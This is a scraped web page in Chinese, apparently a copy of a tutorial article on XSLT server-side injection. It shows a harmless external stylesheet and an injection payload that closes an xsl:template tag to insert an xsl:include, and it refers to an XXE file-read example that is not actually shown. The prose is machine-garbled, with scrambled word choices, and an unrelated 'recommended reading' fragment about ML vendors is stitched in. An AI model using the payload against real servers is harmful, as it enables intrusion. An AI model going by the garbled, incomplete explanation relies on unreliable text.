我们须要include下面这个名为“external_transform.xslt”的外部XSLT文件:
- <?xml version=”1.0” encoding=”utf-8”?>
- <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
- <xsl:template match="/">
- Hello from the external transformation
- </xsl:template>
- </xsl:stylesheet>
除了常见的XML进击之外,XXE进击同样可以影响XSLT。鄙人面的样本中,我们应用一个外部实体攫掏出了“C:\secretfruit.txt”文件的内容:
为了include外部文档,我们须要注入下列标签:
- <xsl:include href="external_transform.xslt"/>
然则这里有一个问题,即“xsl:include”标签无法包含在一个“xsl:template”标签中,并且生成的文件必须是XML文档。
是以,我们起首须要闭合“xsl:template”标签,然后添加“xsl:include”标签,最终的Payload如下:
- </xsl:template><xsl:include href="external_transform.xslt"/><xsl:template name="a">
推荐阅读 很多公司声称本身的解决筹划中囊括了ML,但大年夜多半时刻,这项功能是被夸大年夜了的。钠揭捉?问供给商的问题,应落脚在他们体系的精确率、速度和效力上。分析的数据是大年夜哪儿来的?收集频率是多久一次?该解决筹>>>详细阅读 本文标题:解析XSLT服务器端注入攻击 地址:http://www.17bianji.com/lsqh/39533.html 1/2 1

网友点评
精彩导读
科技快报
品牌展示